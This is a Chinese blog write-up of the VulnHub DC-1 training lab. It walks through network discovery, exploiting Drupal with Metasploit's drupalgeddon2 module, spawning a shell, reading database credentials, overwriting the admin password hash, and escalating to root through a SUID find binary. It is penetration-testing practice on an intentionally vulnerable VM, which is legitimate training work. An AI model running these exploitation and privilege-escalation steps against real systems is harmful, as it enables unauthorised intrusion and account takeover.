【vulnhub】DC1

已于 2022-07-06 13:17:11 修改
阅读量528 收藏
点赞数 2
分类专栏: vulnhub 文章标签: vulnhub
于 2022-06-25 12:23:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_55675216/article/details/125249818
版权

📒博客主页:开心星人的博客主页
🔥系列专栏:vulnhub
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年6月25日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!

靶场下载和安装

下载地址:https://www.vulnhub.com/entry/dc-1-1,292/
在这里插入图片描述
我也不太懂,我选了第二个,可以用

用vmmare打开DC-1.ova
在这里插入图片描述
在这里插入图片描述
选设置
在这里插入图片描述
要选NAT模式

kali也要选NAT模式,这样攻击机和靶机就处于同一内网

开始渗透

主机发现
netdiscover
nmap -sP
arp-scan -l
这里用netdiscover
在这里插入图片描述
太大太小的可能是网关,可以看【Try to Hack】ip地址
所以DC-1 的ip为192.168.88.138

信息收集
nmap -sV 192.168.88.138
在这里插入图片描述
浏览器看看80端口
在这里插入图片描述

drupal这个cms搭建的
在这里插入图片描述

直接上msf
msfconsloe
在这里插入图片描述
search drupal
在这里插入图片描述
随便选择一个模块(基本上都能拿到shell)
use exploit/unix/webapp/drupal_drupalgeddon2
在这里插入图片描述
show options
在这里插入图片描述
set rhost 192.168.88.138 靶机的ip

run
在这里插入图片描述

拿到了shell

使用python获得一个交互式的shell
python -c 'import pty;pty.spawn("/bin/bash")'
在这里插入图片描述
在这里插入图片描述
拿到了第一个flag1

提示我们看配置文件
在这里插入图片描述
在这里插入图片描述
拿到了第二个flag,并获得下一步的提示

还看到了数据库的账号和密码
mysql -u dbuser -p
输入密码
R0ck3t
在这里插入图片描述

进入数据库了
show databases;
在这里插入图片描述
show tables from drupaldb;
在这里插入图片描述
看users表
use drupaldb
select * from users;
在这里插入图片描述
看到了admin和密码的hash
说实话我确实看不出来这是哪种hash算法,想尝试破解这个密码,但是弄不出来
看wp
在scripts录有password-hash.sh文件,可以用该文件生成自己的密码hash值替换数据库hash
给了有hash的算法
php scripts/password-hash.sh 12345
在这里插入图片描述
获得12345的hash

替换数据库中的密码
update drupaldb.users set pass="$S$D1K11z6Umizyw8cxeck4ZVfihCCk41tqi4fEV6e5Tk6lMp8dAaBm" where name="admin";
在这里插入图片描述
成功

在这里插入图片描述
登录进入后台了

在这里插入图片描述
找了好一会,找到了flag3
在这里插入图片描述
suid之find提权 Try to Hack】Linux suid提权

查找拥有suid权限的二进制文件
find / -perm -u=s -type f 2>/dev/null
在这里插入图片描述
/usr/bin/find . -exec /bin/sh \;
在这里插入图片描述
提权成功
一个flag在/etc/passwd里,一个在/root下
在这里插入图片描述
在这里插入图片描述
结束

开心星人
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
vulnhub 入门DC-1
weixin_52780973的博客
12-31 333
vulnhub靶场 入门 DC-1 攻防
DC1 靶机复现详细流程
10-02
DC1 靶机复现详细流程
VulnHubDC-1
qq_45434762的博客
03-21 834
先进行一个粗糙的端口扫描首先我们对靶机所开放的端口进行扫描,发现有22,80,111端口开放Flag1既然开放了80端口,进去看看发现是Dupal CMS没有什么想法,现在MSF中搜一...
vulnhub DC:1靶场
weixin_46420165的博客
12-28 314
据某个帖子说是因为现在有一个在线的MD5数据库,可以查到很多MD5码的原文,因此Drupal 7的开发者认为不能再继续采用这种极不安全的方法了,因此Drupal 7采用了新型的Hash加密方法来确保密码安全。要成功完成这一挑战,您需要 Linux 技能、熟悉 Linux 命令行以及基本渗透测试工具的经验,例如可以在 Kali Linux 或 Parrot Security OS 上找到的工具。网络是为 DHCP 配置的。它旨在对初学者来说是一个挑战,但它的难易程度取决于您的技能和知识以及您的学习能力。
vulnhub靶场实战:DC-1
huangyongkang666的博客
04-18 4466
vulnhub实战:DC-1 1.DC-1介绍 DC-1是一个专门构建的易受攻击的实验室,目的是在渗透测试领域获得经验。 它旨在为初学者带来挑战,但它的容易程度将取决于您的技能和知识以及您的学习能力。 要成功完成此挑战,您将需要Linux技能,熟悉Linux命令行以及具有基本渗透测试工具的经验,例如可以在Kali Linux或Parrot Security OS上找到的工具。 有多种方法可以获得root,但是,我包含了一些包含初学者线索的标志。 总共有五个flag,但最终目标是在root的主目录中找到并读取
看完这篇 教你玩转渗透测试靶机vulnhub——DC1
Aluxian_的博客
03-22 7485
Vulnhub靶机DC1渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装Vulnhub靶机漏洞详解:①:信息收集:②:漏洞发现: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 Vulnhub靶机下载: 官网地址:https://www.vulnhub.com/entry/dc-1,292/ Vulnhub靶机安装: 下载好了把安装
vulnhub dc1
qq_55992895的博客
07-06 845
下载地址1:https://www.vulnhub.com/entry/dc-1,292/下载地址2:https://pan.baidu.com/s/15CUDP2252c_1NFzMOWUKvQ 提取码: md7x打开靶机先用nmap 扫描nmap -sN -T4 192.168.167.0/24 因为局域网内开启的主机比较多扫出了很多IP粗略看一下,有一台开放端口比较多的IP:192.168.167.42nmap -sV 192.168.167.42开启了22 80 111端口也确定这就是靶机后开始
vulnhub DC1
qq_48318463的博客
05-09 722
vulnhubDC1
Vulnhub DC1
qq_45746876的博客
07-21 277
Vulnhub DC1靶机渗透学习
VulnHub DC1
baynk的博客
05-14 303
0x00 靶机环境 下载地址1:https://www.vulnhub.com/entry/dc-1,292/ 下载地址2:https://pan.baidu.com/s/1vJFSgn8yKcV6poOyyz35hg 提取码: u17a DC1共有五个flag需要获取 这里我用的是.ova文件,直接导入虚拟机即可。 开肝。 0x02 渗透流程 由于不知道具体的IP地址,nmap扫上。 这里地址比较少,所以发现目标IP为192.168.181.172,探测下端口及服务信息。 开放了22、80、11
vulnhub靶机DC1
weixin_52450702的博客
10-29 929
靶机DC1IP:192.168.70.160。
esp_dc1:DC1插线板固件
04-14
ESP DC1斐讯DC1智能排插个人固件.WHY众所周知的原因,斐讯服务器已经不能正常访问,插座的APP控制已经无法正常实现,需要有另外的方式实现插座的控制。已有的方法为内网劫持实现,具体可参考。这次要实现的是通过一...
flows.homekit.v1.json.zip
02-15
斐讯 DC1 WIFI 排插,官方 APP 已经无法使用,通过 DNS 劫持到自己的服务器,实现手机控制。使用dnsmasq劫持smartplugconnect.phicomm.com到你NodeRed所在IP,下载脚本,全局搜索替换 "您的DC1的MAC地址" 为您的 DC1...
斐讯DC1插座固件无需更改模块直接烧录支持电量识别MQTT
02-18
DC1固件斐讯DC1插座固件无需更改模块直接烧录支持电量识别MQTT 斐讯DC1插座固件斐讯DC1插座固件斐讯DC1插座固件
靶机-DC1通关详细过程
06-27
靶机-DC1通关详细过程
1203GMT-VB一种N-Channel沟道DFN8(5X6)封装MOS管
07-20
1203GMT-VB;Package:DFN8(5X6);Configuration:Single-N-Channel;VDS:30V;VGS:20(±V);Vth:1.7V;RDS(ON)=9mΩ@VGS=4.5V;RDS(ON)=7mΩ@VGS=10V;ID:80A;Technology:Trench;
Solid Edge 2024是顶级的3D建模程序,用于生成、建模和规划出色的3D模型
07-20
注意:文件为BT文件。Solid Edge 2024是顶级的3D建模程序,用于生成、建模和规划出色的3D模型。它是一个可靠的工具,使用户能够在流畅的工作环境中创建各种复杂和详细的设计,并非常注重细节。它是一套全面且功能齐全的工具集,为专业人士提供了他们进行高效建模和零件制造所需的所有详细信息。这个优秀的应用程序允许你进行快速、灵活的设计修改,强大的组件管理,以及轻松整合多CAD数据。它还提供改进的结构和热模拟,包括快速热移动。此外,它可以直接用于复杂组件的布局,如电线、梁、传输线等项目。它允许专业人士在同一个协作设计平台上处理并发和传统的结构组件。你也可以下载Altair SimSolid 2024。
鲍威尔法C语言鲍威尔法C语言
最新发布
07-20
c语言,鲍威尔法C语言
java基于ssm+vue安全教育平台系统源码 带毕业论文
07-20
【资源说明】 1、开发环境:ssm框架;内含Mysql数据库;VUE技术 2、该资源包括项目的全部源码,下载可以直接使用! 3、本项目适合作为计算机、数学、电子信息等专业的课程设计、期末大作业和毕设项目,作为参考资料学习借鉴。 4、本资源作为“参考资料”如果需要实现其他功能,需要能看懂代码,并且热爱钻研,自行调试。
dc1无法反弹shell
08-05
回答: 反弹shell的问题可能是由于配置或命令错误导致的。请确保您按照正确的步骤执行了反弹shell的过程。首先,您需要确保攻击机上的监听程序已经正确启动,可以使用nc命令监听指定的端口。接下来,您需要确保在目标机器上正确添加了反弹shell的代码,并将其放置在适当的位置,比如backups.sh文件中。最后,您需要等待计划任务执行反弹shell的代码。如果仍然无法成功反弹shell,请检查您的代码和配置是否正确,并确保您有足够的权限执行这些操作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

开心星人

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值